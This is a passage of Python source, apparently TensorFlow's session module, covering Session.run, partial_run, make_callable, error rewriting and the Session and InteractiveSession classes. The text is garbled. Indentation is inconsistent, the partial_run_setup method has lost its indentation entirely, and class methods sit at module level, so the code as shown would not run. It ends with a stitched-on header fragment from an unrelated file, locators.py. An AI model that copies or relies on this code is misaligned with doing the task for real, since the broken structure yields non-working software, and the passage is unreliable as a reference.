    # v is a Python list with 2 numpy arrays: the 1-D array [10, 20] and the
    # 1-D array [1.0, 2.0]
    # 'fetches' can be arbitrary lists, tuples, namedtuple, dicts:
    MyData = collections.namedtuple('MyData', ['a', 'b'])
    v = session.run({'k1': MyData(a, b), 'k2': [b, a]})
    # v is a dict with
    # v['k1'] is a MyData namedtuple with 'a' (the numpy array [10, 20]) and
    # 'b' (the numpy array [1.0, 2.0])
    # v['k2'] is a list with the numpy array [1.0, 2.0] and the numpy array
    # [10, 20].
    ```

    The optional `feed_dict` argument allows the caller to override
    the value of tensors in the graph. Each key in `feed_dict` can be
    one of the following types:

    * If the key is a `tf.Tensor`, the
      value may be a Python scalar, string, list, or numpy ndarray
      that can be converted to the same `dtype` as that
      tensor. Additionally, if the key is a
      `tf.compat.v1.placeholder`, the shape of
      the value will be checked for compatibility with the placeholder.
    * If the key is a
      `tf.sparse.SparseTensor`,
      the value should be a
      `tf.compat.v1.SparseTensorValue`.
    * If the key is a nested tuple of `Tensor`s or `SparseTensor`s, the value
      should be a nested tuple with the same structure that maps to their
      corresponding values as above.

    Each value in `feed_dict` must be convertible to a numpy array of the dtype
    of the corresponding key.

    The optional `options` argument expects a [`RunOptions`] proto. The options
    allow controlling the behavior of this particular step (e.g. turning tracing
    on).

    The optional `run_metadata` argument expects a [`RunMetadata`] proto. When
    appropriate, the non-Tensor output of this step will be collected there. For
    example, when users turn on tracing in `options`, the profiled info will be
    collected into this argument and passed back.

    Args:
      fetches: A single graph element, a list of graph elements, or a dictionary
        whose values are graph elements or lists of graph elements (described
        above).
      feed_dict: A dictionary that maps graph elements to values (described
        above).
      options: A [`RunOptions`] protocol buffer
      run_metadata: A [`RunMetadata`] protocol buffer

    Returns:
      Either a single value if `fetches` is a single graph element, or
      a list of values if `fetches` is a list, or a dictionary with the
      same keys as `fetches` if that is a dictionary (described above).
      Order in which `fetches` operations are evaluated inside the call
      is undefined.

    Raises:
      RuntimeError: If this `Session` is in an invalid state (e.g. has been
        closed).
      TypeError: If `fetches` or `feed_dict` keys are of an inappropriate type.
      ValueError: If `fetches` or `feed_dict` keys are invalid or refer to a
        `Tensor` that doesn't exist.
    """
    # Serialize `options` into a C buffer up front; `run_metadata` gets an
    # empty C buffer that the runtime fills in during the step.
    options_ptr = tf_session.TF_NewBufferFromString(
        compat.as_bytes(options.SerializeToString())) if options else None
    run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None

    try:
      result = self._run(None, fetches, feed_dict, options_ptr,
                         run_metadata_ptr)
      if run_metadata:
        # Copy the metadata collected by the runtime back into the caller's
        # RunMetadata proto.
        proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
        run_metadata.ParseFromString(compat.as_bytes(proto_data))
    finally:
      # Always release the C buffers, even when `_run` raised.
      if run_metadata_ptr:
        tf_session.TF_DeleteBuffer(run_metadata_ptr)
      if options:
        tf_session.TF_DeleteBuffer(options_ptr)
    return result
  def partial_run(self, handle, fetches, feed_dict=None):
    """Continues the execution with more feeds and fetches.

    This is EXPERIMENTAL and subject to change.

    To use partial execution, a user first calls `partial_run_setup()` and
    then a sequence of `partial_run()`. `partial_run_setup` specifies the
    list of feeds and fetches that will be used in the subsequent
    `partial_run` calls.

    The optional `feed_dict` argument allows the caller to override
    the value of tensors in the graph. See run() for more information.

    Below is a simple example:

    ```python
    a = array_ops.placeholder(dtypes.float32, shape=[])
    b = array_ops.placeholder(dtypes.float32, shape=[])
    c = array_ops.placeholder(dtypes.float32, shape=[])
    r1 = math_ops.add(a, b)
    r2 = math_ops.multiply(r1, c)

    h = sess.partial_run_setup([r1, r2], [a, b, c])
    res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
    res = sess.partial_run(h, r2, feed_dict={c: res})
    ```

    Args:
      handle: A handle for a sequence of partial runs.
      fetches: A single graph element, a list of graph elements, or a dictionary
        whose values are graph elements or lists of graph elements (see
        documentation for `run`).
      feed_dict: A dictionary that maps graph elements to values (described
        above).

    Returns:
      Either a single value if `fetches` is a single graph element, or
      a list of values if `fetches` is a list, or a dictionary with the
      same keys as `fetches` if that is a dictionary
      (see documentation for `run`).

    Raises:
      tf.errors.OpError: Or one of its subclasses on error.
    """
    # TODO(touts): Support feeding and fetching the same tensor.
    # Delegates to `_run`; a non-None `handle` selects the partial-run path.
    return self._run(handle, fetches, feed_dict, None, None)
def partial_run_setup(self, fetches, feeds=None):
"""Sets up a graph with feeds and fetches for partial run.
This is EXPERIMENTAL and subject to change.
Note that contrary to `run`, `feeds` only specifies the graph elements.
The tensors will be supplied by the subsequent `partial_run` calls.
Args:
fetches: A single graph element, or a list of graph elements.
feeds: A single graph element, or a list of graph elements.
Returns:
A handle for partial run.
Raises:
RuntimeError: If this `Session` is in an invalid state (e.g. has been
closed).
TypeError: If `fetches` or `feed_dict` keys are of an inappropriate type.
tf.errors.OpError: Or one of its subclasses if a TensorFlow error happens.
"""
def _feed_fn(feed):
for tensor_type, _, _, feed_fn in _REGISTERED_EXPANSIONS:
if isinstance(feed, tensor_type):
return feed_fn(feed)
raise TypeError('Feed argument %r has invalid type %r' %
(feed, type(feed)))
# Check session.
if self._closed:
raise RuntimeError('Attempted to use a closed Session.')
if self.graph.version == 0:
raise RuntimeError('The Session graph is empty. Add operations to the '
'graph before calling run().')
if feeds is None:
feeds = []
# Create request.
feed_list = []
# Validate and process feed_list.
is_list_feed = isinstance(feeds, (list, tuple))
if not is_list_feed:
feeds = [feeds]
for feed in feeds:
for subfeed in _feed_fn(feed):
try:
subfeed_t = self.graph.as_graph_element(
subfeed, allow_tensor=True, allow_operation=False)
# pylint: disable=protected-access
feed_list.append(subfeed_t._as_tf_output())
# pylint: enable=protected-access
except Exception as e:
e.message = ('Cannot interpret feed_list key as Tensor: ' + e.message)
e.args = (e.message,)
raise e
# Validate and process fetches.
# TODO(touts): Support feeding and fetching the same tensor.
fetch_handler = _FetchHandler(self._graph, fetches, {})
# Set up a graph with feeds and fetches for partial run.
def _setup_fn(session, feed_list, fetch_list, target_list):
self._extend_graph()
return tf_session.TF_SessionPRunSetup_wrapper(session, feed_list,
fetch_list, target_list)
# pylint: disable=protected-access
final_fetches = [t._as_tf_output() for t in fetch_handler.fetches()]
final_targets = [op._c_op for op in fetch_handler.targets()]
# pylint: enable=protected-access
return self._do_call(_setup_fn, self._session, feed_list, final_fetches,
final_targets)
def _run(self, handle, fetches, feed_dict, options, run_metadata):
    """Perform either run or partial_run, depending the presence of `handle`."""

    # Expands a compound feed into its (subfeed, subfeed_val) pairs using
    # the registered expansion table (third slot of each entry).
    def _feed_fn(feed, feed_val):
        for tensor_type, _, feed_fn, _ in _REGISTERED_EXPANSIONS:
            if isinstance(feed, tensor_type):
                return feed_fn(feed, feed_val)
        raise TypeError('Feed argument %r has invalid type %r' %
                        (feed, type(feed)))

    # Check session.
    if self._closed:
        raise RuntimeError('Attempted to use a closed Session.')
    if self.graph.version == 0:
        raise RuntimeError('The Session graph is empty. Add operations to the '
                           'graph before calling run().')

    # Create request.
    feed_dict_tensor = {}  # tensor ref -> numpy value actually fed
    feed_map = {}  # tensor name (bytes) -> (tensor, original feed value)

    # Validate and process feed_dict.
    feed_handles = {}  # tensor ref -> TensorHandle, for handle feeds only
    if feed_dict:
        feed_dict = nest.flatten_dict_items(feed_dict)
        for feed, feed_val in feed_dict.items():
            for subfeed, subfeed_val in _feed_fn(feed, feed_val):
                try:
                    subfeed_t = self.graph.as_graph_element(
                        subfeed, allow_tensor=True, allow_operation=False)
                except Exception as e:
                    raise TypeError('Cannot interpret feed_dict key as Tensor: ' +
                                    e.args[0])
                if isinstance(subfeed_val, ops.Tensor):
                    raise TypeError('The value of a feed cannot be a tf.Tensor object. '
                                    'Acceptable feed values include Python scalars, '
                                    'strings, lists, numpy ndarrays, or TensorHandles. '
                                    'For reference, the tensor object was ' +
                                    str(feed_val) + ' which was passed to the '
                                    'feed with key ' + str(feed) + '.')

                subfeed_dtype = subfeed_t.dtype.as_numpy_dtype
                # Reject Python ints that would silently wrap or truncate when
                # converted to the tensor's numpy dtype.
                if isinstance(subfeed_val, int) and _convert_to_numpy_obj(
                        subfeed_dtype, subfeed_val) != subfeed_val:
                    raise TypeError(
                        'Type of feed value ' + str(subfeed_val) + ' with type ' +
                        str(type(subfeed_val)) +
                        ' is not compatible with Tensor type ' + str(subfeed_dtype) +
                        '. Try explicitly setting the type of the feed tensor'
                        ' to a larger type (e.g. int64).')

                is_tensor_handle_feed = isinstance(subfeed_val,
                                                   session_ops.TensorHandle)
                if is_tensor_handle_feed:
                    np_val = subfeed_val.to_numpy_array()
                    feed_handles[subfeed_t.ref()] = subfeed_val
                else:
                    np_val = np.asarray(subfeed_val, dtype=subfeed_dtype)

                # Handle feeds carry an opaque handle, so the shape check is
                # skipped for them.
                if (not is_tensor_handle_feed and
                        not subfeed_t.get_shape().is_compatible_with(np_val.shape)):
                    raise ValueError(
                        'Cannot feed value of shape %r for Tensor %r, '
                        'which has shape %r' %
                        (np_val.shape, subfeed_t.name, str(subfeed_t.get_shape())))
                if not self.graph.is_feedable(subfeed_t):
                    raise ValueError('Tensor %s may not be fed.' % subfeed_t)

                feed_dict_tensor[subfeed_t.ref()] = np_val
                feed_map[compat.as_bytes(subfeed_t.name)] = (subfeed_t, subfeed_val)

    # Create a fetch handler to take care of the structure of fetches.
    fetch_handler = _FetchHandler(
        self._graph, fetches, feed_dict_tensor, feed_handles=feed_handles)

    # Run request and get response.
    # We need to keep the returned movers alive for the following _do_run().
    # These movers are no longer needed when _do_run() completes, and
    # are deleted when `movers` goes out of scope when this _run() ends.
    # TODO(yuanbyu, keveman): Revisit whether we should just treat feeding
    # of a handle from a different device as an error.
    _ = self._update_with_movers(feed_dict_tensor, feed_map)
    final_fetches = fetch_handler.fetches()
    final_targets = fetch_handler.targets()
    # We only want to really perform the run if fetches or targets are provided,
    # or if the call is a partial run that specifies feeds.
    if final_fetches or final_targets or (handle and feed_dict_tensor):
        results = self._do_run(handle, final_targets, final_fetches,
                               feed_dict_tensor, options, run_metadata)
    else:
        results = []
    return fetch_handler.build_results(self, results)
def make_callable(self, fetches, feed_list=None, accept_options=False):
    """Returns a Python callable that runs a particular step.

    The returned callable will take `len(feed_list)` arguments whose types
    must be compatible feed values for the respective elements of `feed_list`.
    For example, if element `i` of `feed_list` is a `tf.Tensor`, the `i`th
    argument to the returned callable must be a numpy ndarray (or something
    convertible to an ndarray) with matching element type and shape. See
    `tf.Session.run` for details of the allowable feed key and value types.

    The returned callable will have the same return type as
    `tf.Session.run(fetches, ...)`. For example, if `fetches` is a `tf.Tensor`,
    the callable will return a numpy ndarray; if `fetches` is a `tf.Operation`,
    it will return `None`.

    Args:
      fetches: A value or list of values to fetch. See `tf.Session.run` for
        details of the allowable fetch types.
      feed_list: (Optional.) A list of `feed_dict` keys. See `tf.Session.run`
        for details of the allowable feed key types.
      accept_options: (Optional.) If `True`, the returned `Callable` will be
        able to accept `tf.compat.v1.RunOptions` and `tf.compat.v1.RunMetadata`
        as optional keyword arguments `options` and `run_metadata`,
        respectively, with the same syntax and semantics as `tf.Session.run`,
        which is useful for certain use cases (profiling and debugging) but will
        result in measurable slowdown of the `Callable`'s
        performance. Default: `False`.

    Returns:
      A function that when called will execute the step defined by
      `feed_list` and `fetches` in this session.

    Raises:
      TypeError: If `fetches` or `feed_list` cannot be interpreted
        as arguments to `tf.Session.run`.
    """
    if feed_list is not None:
        if not isinstance(feed_list, (list, tuple)):
            raise TypeError('`feed_list` must be a list or tuple.')
        # Delegate any non-empty feed lists to the existing `run()` logic.
        # TODO(mrry): Refactor the feed handling logic from
        # `Session._run()` so that we can convert the feeds to a list of
        # strings here.
        def _generic_run(*feed_args, **kwargs):
            feed_dict = {
                feed: feed_val for feed, feed_val in zip(feed_list, feed_args)
            }
            return self.run(fetches, feed_dict=feed_dict, **kwargs)

        return _generic_run

    # Ensure any changes to the graph are reflected in the runtime.
    # Note that we don't need to do this on subsequent calls to the
    # returned object, because the arguments to `fetches` must already be
    # in the graph.
    self._extend_graph()

    # Create a fetch handler to take care of the structure of fetches.
    fetch_handler = _FetchHandler(self._graph, fetches, {})

    # Convert fetches/targets to their C-API representations once, up front.
    # pylint: disable=protected-access
    fetch_list = [t._as_tf_output() for t in fetch_handler.fetches()]
    target_list = [op._c_op for op in fetch_handler.targets()]
    # pylint: enable=protected-access

    def _callable_template_with_options_and_metadata(fetch_list,
                                                     target_list,
                                                     fetch_handler,
                                                     options=None,
                                                     run_metadata=None):
        """Template callable that accepts RunOptions and RunMetadata."""
        options_ptr = tf_session.TF_NewBufferFromString(
            compat.as_bytes(options.SerializeToString())) if options else None
        run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
        try:
            results = self._call_tf_sessionrun(options_ptr, {}, fetch_list,
                                               target_list, run_metadata_ptr)
            if fetch_handler:
                results = fetch_handler.build_results(self, results)
            else:
                results = results[0] if results else None
            if run_metadata:
                proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
                run_metadata.ParseFromString(compat.as_bytes(proto_data))
        finally:
            # Free the C buffers whether or not the run succeeded.
            if run_metadata_ptr:
                tf_session.TF_DeleteBuffer(run_metadata_ptr)
            if options:
                tf_session.TF_DeleteBuffer(options_ptr)
        return results

    if accept_options:
        return functools.partial(_callable_template_with_options_and_metadata,
                                 fetch_list, target_list, fetch_handler)
    elif isinstance(fetches, ops.Operation):
        # Special case for fetching a single operation, because the
        # function will have no return value.
        assert not fetch_list
        assert len(target_list) == 1

        def _single_operation_run():
            self._call_tf_sessionrun(None, {}, [], target_list, None)

        return _single_operation_run
    elif isinstance(fetches, ops.Tensor):
        # Special case for fetching a single tensor, because the
        # function can return the result of `TF_Run()` directly.
        assert len(fetch_list) == 1
        assert not target_list

        def _single_tensor_run():
            results = self._call_tf_sessionrun(None, {}, fetch_list, [], None)
            return results[0]

        return _single_tensor_run
    else:
        # In all other cases, we must use `fetch_handler` to build the
        # results for us.
        def _fetch_handler_run():
            results = self._call_tf_sessionrun(None, {}, fetch_list, target_list,
                                               None)
            return fetch_handler.build_results(self, results)

        return _fetch_handler_run
# Captures the name of a node in an error status. The regex below matches
# both the old and the new formats:
# Old format: [[Node: <node_name> = ...]]
# New format: [[{{node <node_name>}} = ...]]
# Group 3 holds the node name; _do_call uses it to look up the failing op.
_NODEDEF_NAME_RE = re.compile(
    r'\[\[(Node: )?(\{\{node )?([^\} ]*)(\}\})?\s*=*')
def _do_run(self, handle, target_list, fetch_list, feed_dict, options,
            run_metadata):
    """Runs a step based on the given fetches and feeds.

    Args:
      handle: a handle for partial_run. None if this is just a call to run().
      target_list: A list of operations to be run, but not fetched.
      fetch_list: A list of tensors to be fetched.
      feed_dict: A dictionary that maps tensors to numpy ndarrays.
      options: A (pointer to a) [`RunOptions`] protocol buffer, or None
      run_metadata: A (pointer to a) [`RunMetadata`] protocol buffer, or None

    Returns:
      A list of numpy ndarrays, corresponding to the elements of
      `fetch_list`. If the ith element of `fetch_list` contains the
      name of an operation, the first Tensor output of that operation
      will be returned for that element.

    Raises:
      tf.errors.OpError: Or one of its subclasses on error.
    """
    # Convert graph-level objects to the C-API representations expected by
    # the session wrappers.
    # pylint: disable=protected-access
    feeds = dict((t.deref()._as_tf_output(), v) for t, v in feed_dict.items())
    fetches = [t._as_tf_output() for t in fetch_list]
    targets = [op._c_op for op in target_list]
    # pylint: enable=protected-access

    def _run_fn(feed_dict, fetch_list, target_list, options, run_metadata):
        # Ensure any changes to the graph are reflected in the runtime.
        self._extend_graph()
        return self._call_tf_sessionrun(options, feed_dict, fetch_list,
                                        target_list, run_metadata)

    def _prun_fn(handle, feed_dict, fetch_list):
        if target_list:
            raise RuntimeError('partial_run() requires empty target_list.')
        return self._call_tf_sessionprun(handle, feed_dict, fetch_list)

    # _do_call annotates any OpError raised below with graph debug info.
    if handle is None:
        return self._do_call(_run_fn, feeds, fetches, targets, options,
                             run_metadata)
    else:
        return self._do_call(_prun_fn, handle, feeds, fetches)
def _do_call(self, fn, *args):
    """Invoke `fn(*args)`, rewriting any `errors.OpError` with graph context.

    The failing node's name is parsed out of the error message, resolved to
    an `Operation` in this graph when possible, and the message is
    re-interpolated with graph information before an exception of the same
    type is re-raised.
    """
    try:
        return fn(*args)
    except errors.OpError as e:
        message = compat.as_text(e.message)
        m = BaseSession._NODEDEF_NAME_RE.search(message)
        node_def = None
        op = None
        if m is not None:
            node_name = m.group(3)
            try:
                op = self._graph.get_operation_by_name(node_name)
                node_def = op.node_def
            except KeyError:
                # The node named in the message is not in this graph;
                # re-raise without op/node_def context.
                pass
        message = error_interpolation.interpolate(message, self._graph)
        if 'only supports NHWC tensor format' in message:
            message += ('\nA possible workaround: Try disabling Grappler optimizer'
                        '\nby modifying the config for creating the session eg.'
                        '\nsession_config.graph_options.rewrite_options.'
                        'disable_meta_optimizer = True')
        raise type(e)(node_def, op, message)
def _extend_graph(self):
    """Flush pending graph operations into the underlying C++ session."""
    # Hold the graph's session-run lock so extension does not race with
    # concurrent run() calls mutating the graph.
    with self._graph._session_run_lock():  # pylint: disable=protected-access
        tf_session.ExtendSession(self._session)
# The threshold to run garbage collection to delete dead tensors.
# Once this many dead handles accumulate, _register_dead_handle runs the
# deleter ops for the whole batch in one run() call.
_DEAD_HANDLES_THRESHOLD = 10
def _register_dead_handle(self, handle):
    """Record a dead tensor handle and garbage-collect once enough pile up.

    The handle is appended under `_delete_lock`; when the backlog reaches
    `_DEAD_HANDLES_THRESHOLD`, the whole batch is swapped out and the
    corresponding deleter ops are executed in a single `run()` call.
    """
    doomed = None
    with self._delete_lock:
        self._dead_handles.append(handle)
        if len(self._dead_handles) == BaseSession._DEAD_HANDLES_THRESHOLD:
            doomed, self._dead_handles = self._dead_handles, []
    if not doomed:
        return
    # Build one feed/fetch pair per dead handle, then delete them all at once.
    deleter_feeds = {}
    deleter_fetches = []
    for key, dead_handle in enumerate(doomed):
        holder, deleter = session_ops._get_handle_deleter(
            self.graph, key, dead_handle)
        deleter_feeds[holder] = dead_handle
        deleter_fetches.append(deleter)
    self.run(deleter_fetches, feed_dict=deleter_feeds)
def _update_with_movers(self, feed_dict, feed_map):
    """Move fed tensor handles to compatible devices, updating `feed_dict`.

    If a tensor handle is fed to a device-incompatible placeholder, the
    tensor is moved to the right device, a new tensor handle is generated,
    and `feed_dict` is updated to use the new handle.

    Args:
      feed_dict: Dict mapping tensor refs to feed values; mutated in place
        for any handle that had to be moved.
      feed_map: Dict mapping tensor names (bytes) to (tensor, value) pairs.

    Returns:
      The list of new handles produced by the mover ops (the caller keeps
      them alive for the duration of the following `_do_run()`), or `[]`
      if no moves were needed.
    """
    handle_movers = []
    for feed_name, val in feed_map.items():
        mover = session_ops._get_handle_mover(self.graph, *val)
        if mover:
            handle_movers.append((feed_name, val[1], mover))
    # Transfer a tensor to the right device if needed.
    if not handle_movers:
        return []
    feeds = {}
    fetches = []
    for _, handle, mover in handle_movers:
        feeds[mover[0]] = handle
        fetches.append(mover[1])
    handles = self.run(fetches, feed_dict=feeds)
    for handle_mover, handle in zip(handle_movers, handles):
        # BUG FIX: `np.object` was deprecated in NumPy 1.20 and removed in
        # 1.24; the builtin `object` is the equivalent dtype spelling.
        np_val = np.array(handle.handle, dtype=object)
        feed_name = handle_mover[0]
        feed_tensor = feed_map[feed_name][0]
        feed_dict[feed_tensor.ref()] = np_val
    return handles
def _call_tf_sessionrun(self, options, feed_dict, fetch_list, target_list,
                        run_metadata):
    """Thin wrapper over the C API's session-run entry point."""
    return tf_session.TF_SessionRun_wrapper(self._session, options, feed_dict,
                                            fetch_list, target_list,
                                            run_metadata)
def _call_tf_sessionprun(self, handle, feed_dict, fetch_list):
    """Thin wrapper over the C API's partial-run entry point."""
    return tf_session.TF_SessionPRun_wrapper(self._session, handle, feed_dict,
                                             fetch_list)
# pylint: disable=protected-access
class _Callable(object):
    """Experimental wrapper for the C++ `Session::MakeCallable()` API."""

    def __init__(self, session, callable_options):
        self._session = session
        self._handle = None
        options_ptr = tf_session.TF_NewBufferFromString(
            compat.as_bytes(callable_options.SerializeToString()))
        try:
            self._handle = tf_session.TF_SessionMakeCallable(
                session._session, options_ptr)
        finally:
            tf_session.TF_DeleteBuffer(options_ptr)

    def __call__(self, *args, **kwargs):
        run_metadata = kwargs.get('run_metadata', None)
        # BUG FIX: allocate the metadata buffer *before* entering the try
        # block. Previously the assignment lived inside the try, so a
        # failure in TF_NewBuffer() made the finally clause raise
        # UnboundLocalError on `run_metadata_ptr`, masking the real error.
        run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
        try:
            ret = tf_session.TF_SessionRunCallable(self._session._session,
                                                   self._handle, args,
                                                   run_metadata_ptr)
            if run_metadata:
                proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
                run_metadata.ParseFromString(compat.as_bytes(proto_data))
        finally:
            if run_metadata_ptr:
                tf_session.TF_DeleteBuffer(run_metadata_ptr)
        return ret

    def __del__(self):
        # NOTE(mrry): It is possible that `self._session.__del__()` could be
        # called before this destructor, in which case `self._session._session`
        # will be `None`.
        if (self._handle is not None and self._session._session is not None and
                not self._session._closed):
            tf_session.TF_SessionReleaseCallable(self._session._session,
                                                 self._handle)
# pylint: enable=protected-access
def _make_callable_from_options(self, callable_options):
    """Returns a handle to a "callable" with the given options.

    Args:
      callable_options: A `CallableOptions` protocol buffer message describing
        the computation that will be performed by the callable.

    Returns:
      A handle to the new callable.
    """
    # Make sure pending graph changes are visible to the runtime before the
    # callable is created.
    self._extend_graph()
    return BaseSession._Callable(self, callable_options)
@tf_export(v1=['Session'])
class Session(BaseSession):
    """A class for running TensorFlow operations.

    A `Session` object encapsulates the environment in which `Operation`
    objects are executed, and `Tensor` objects are evaluated. For
    example:

    ```python
    tf.compat.v1.disable_eager_execution() # need to disable eager in TF2.x

    # Build a graph.
    a = tf.constant(5.0)
    b = tf.constant(6.0)
    c = a * b

    # Launch the graph in a session.
    sess = tf.compat.v1.Session()

    # Evaluate the tensor `c`.
    print(sess.run(c)) # prints 30.0
    ```

    A session may own resources, such as
    `tf.Variable`, `tf.queue.QueueBase`,
    and `tf.compat.v1.ReaderBase`. It is important to release
    these resources when they are no longer required. To do this, either
    invoke the `tf.Session.close` method on the session, or use
    the session as a context manager. The following two examples are
    equivalent:

    ```python
    # Using the `close()` method.
    sess = tf.compat.v1.Session()
    sess.run(...)
    sess.close()

    # Using the context manager.
    with tf.compat.v1.Session() as sess:
      sess.run(...)
    ```

    The
    [`ConfigProto`](https://www.tensorflow.org/code/tensorflow/core/protobuf/config.proto)
    protocol buffer exposes various configuration options for a
    session. For example, to create a session that uses soft constraints
    for device placement, and log the resulting placement decisions,
    create a session as follows:

    ```python
    # Launch the graph in a session that allows soft device placement and
    # logs the placement decisions.
    sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(
        allow_soft_placement=True,
        log_device_placement=True))
    ```
    """

    def __init__(self, target='', graph=None, config=None):
        """Creates a new TensorFlow session.

        If no `graph` argument is specified when constructing the session,
        the default graph will be launched in the session. If you are
        using more than one graph (created with `tf.Graph()`) in the same
        process, you will have to use different sessions for each graph,
        but each graph can be used in multiple sessions. In this case, it
        is often clearer to pass the graph to be launched explicitly to
        the session constructor.

        Args:
          target: (Optional.) The execution engine to connect to. Defaults to using
            an in-process engine. See
            [Distributed TensorFlow](https://tensorflow.org/deploy/distributed) for
            more examples.
          graph: (Optional.) The `Graph` to be launched (described above).
          config: (Optional.) A
            [`ConfigProto`](https://www.tensorflow.org/code/tensorflow/core/protobuf/config.proto)
            protocol buffer with configuration options for the session.
        """
        super(Session, self).__init__(target, graph, config=config)
        # NOTE(mrry): Create these on first `__enter__` to avoid a reference cycle.
        self._default_graph_context_manager = None
        self._default_session_context_manager = None

    def __enter__(self):
        # Sessions are not re-entrant as context managers: the graph context
        # manager is created exactly once and guards against nested entry.
        if self._default_graph_context_manager is None:
            self._default_graph_context_manager = self.graph.as_default()
        else:
            raise RuntimeError('Session context managers are not re-entrant. '
                               'Use `Session.as_default()` if you want to enter '
                               'a session multiple times.')
        if self._default_session_context_manager is None:
            self._default_session_context_manager = self.as_default()
        self._default_graph_context_manager.__enter__()
        return self._default_session_context_manager.__enter__()

    def __exit__(self, exec_type, exec_value, exec_tb):
        # NOTE(review): this identity check matches only the OpError base
        # class itself, never one of its subclasses, so it rarely fires.
        # Presumably isinstance/issubclass was intended -- confirm before
        # changing, as that would also log for all OpError subclasses.
        if exec_type is errors.OpError:
            logging.error('Session closing due to OpError: %s', (exec_value,))
        try:
            self._default_session_context_manager.__exit__(exec_type, exec_value,
                                                           exec_tb)
        except RuntimeError as error:
            if error == exec_value:
                # NOTE(skyewm): for some reason, in Python3,
                # _default_session_context_manager.__exit__ will re-raise the "not
                # re-entrant" exception raised in __enter__ above (note that if we're
                # here, we're in the outer session context manager, since __exit__ is
                # not called when __enter__ raises an exception). We still want to
                # continue cleaning up this context manager before the exception is
                # further propagated, so we ignore it here (note that it'll continue
                # being propagated after this method completes).
                pass
            else:
                raise
        self._default_graph_context_manager.__exit__(exec_type, exec_value, exec_tb)

        self._default_session_context_manager = None
        self._default_graph_context_manager = None

        # If we are closing due to an exception, set a time limit on our Close() to
        # avoid blocking forever.
        # TODO(b/120204635) remove this when deadlock is fixed.
        if exec_type:
            close_thread = threading.Thread(
                name='SessionCloseThread', target=self.close)
            close_thread.daemon = True
            close_thread.start()
            close_thread.join(30.0)
            if close_thread.is_alive():
                logging.error(
                    'Session failed to close after 30 seconds. Continuing after this '
                    'point may leave your program in an undefined state.')
        else:
            self.close()

    @staticmethod
    def reset(target, containers=None, config=None):
        """Resets resource containers on `target`, and close all connected sessions.

        A resource container is distributed across all workers in the
        same cluster as `target`. When a resource container on `target`
        is reset, resources associated with that container will be cleared.
        In particular, all Variables in the container will become undefined:
        they lose their values and shapes.

        NOTE:
        (i) reset() is currently only implemented for distributed sessions.
        (ii) Any sessions on the master named by `target` will be closed.

        If no resource containers are provided, all containers are reset.

        Args:
          target: The execution engine to connect to.
          containers: A list of resource container name strings, or `None` if all of
            all the containers are to be reset.
          config: (Optional.) Protocol buffer with configuration options.

        Raises:
          tf.errors.OpError: Or one of its subclasses if an error occurs while
            resetting containers.
        """
        if target is not None:
            target = compat.as_bytes(target)
        if containers is not None:
            containers = [compat.as_bytes(c) for c in containers]
        else:
            containers = []
        tf_session.TF_Reset(target, containers, config)
@tf_export(v1=['InteractiveSession'])
class InteractiveSession(BaseSession):
    """A TensorFlow `Session` for use in interactive contexts, such as a shell.

    The only difference with a regular `Session` is that an `InteractiveSession`
    installs itself as the default session on construction.
    The methods `tf.Tensor.eval`
    and `tf.Operation.run`
    will use that session to run ops.

    This is convenient in interactive shells and [IPython
    notebooks](http://ipython.org), as it avoids having to pass an explicit
    `Session` object to run ops.

    For example:

    ```python
    sess = tf.compat.v1.InteractiveSession()
    a = tf.constant(5.0)
    b = tf.constant(6.0)
    c = a * b
    # We can just use 'c.eval()' without passing 'sess'
    print(c.eval())
    sess.close()
    ```

    Note that a regular session installs itself as the default session when it
    is created in a `with` statement. The common usage in non-interactive
    programs is to follow that pattern:

    ```python
    a = tf.constant(5.0)
    b = tf.constant(6.0)
    c = a * b
    with tf.compat.v1.Session():
      # We can also use 'c.eval()' here.
      print(c.eval())
    ```
    """

    # Guards _active_session_count across threads.
    _count_lock = threading.Lock()
    # Number of InteractiveSessions currently open. GUARDED_BY(_count_lock)
    _active_session_count = 0

    def __init__(self, target='', graph=None, config=None):
        """Creates a new interactive TensorFlow session.

        If no `graph` argument is specified when constructing the session,
        the default graph will be launched in the session. If you are
        using more than one graph (created with `tf.Graph()`) in the same
        process, you will have to use different sessions for each graph,
        but each graph can be used in multiple sessions. In this case, it
        is often clearer to pass the graph to be launched explicitly to
        the session constructor.

        Args:
          target: (Optional.) The execution engine to connect to. Defaults to using
            an in-process engine.
          graph: (Optional.) The `Graph` to be launched (described above).
          config: (Optional) `ConfigProto` proto used to configure the session.
        """
        if not config:
            # If config is not provided, choose some reasonable defaults for
            # interactive use:
            #
            # - Grow GPU memory as needed at the cost of fragmentation.
            gpu_options = config_pb2.GPUOptions(allow_growth=True)
            config = config_pb2.ConfigProto(gpu_options=gpu_options)
        # Interactive sessions always place pruned graphs.
        config.graph_options.place_pruned_graph = True

        super(InteractiveSession, self).__init__(target, graph, config)
        with InteractiveSession._count_lock:
            if InteractiveSession._active_session_count > 0:
                warnings.warn('An interactive session is already active. This can '
                              'cause out-of-memory errors in some cases. You must '
                              'explicitly call `InteractiveSession.close()` to release '
                              'resources held by the other session(s).')
            InteractiveSession._active_session_count += 1
        # NOTE(mrry): We do not use `Session._closed` here because it has unhelpful
        # semantics (in particular, it is not set to true if `Session.close()` is
        # called on a session that has not been "opened" by running a step) and we
        # cannot change those semantics without breaking existing code.
        self._explicitly_closed = False

        # Enter the default-session (and optionally default-graph) context
        # managers immediately; close() exits them again.
        self._default_session = self.as_default()
        self._default_session.enforce_nesting = False
        self._default_session.__enter__()
        self._explicit_graph = graph
        if self._explicit_graph is not None:
            self._default_graph = graph.as_default()
            self._default_graph.enforce_nesting = False
            self._default_graph.__enter__()

    def close(self):
        """Closes an `InteractiveSession`."""
        super(InteractiveSession, self).close()
        with InteractiveSession._count_lock:
            if not self._explicitly_closed:
                InteractiveSession._active_session_count -= 1
                self._explicitly_closed = True
            else:
                # Already closed once: don't exit the context managers twice.
                return
        if self._explicit_graph is not None:
            self._default_graph.__exit__(None, None, None)
            self._default_graph = None
        self._default_session.__exit__(None, None, None)
        self._default_session = None
|
locators.py | # -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2015 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
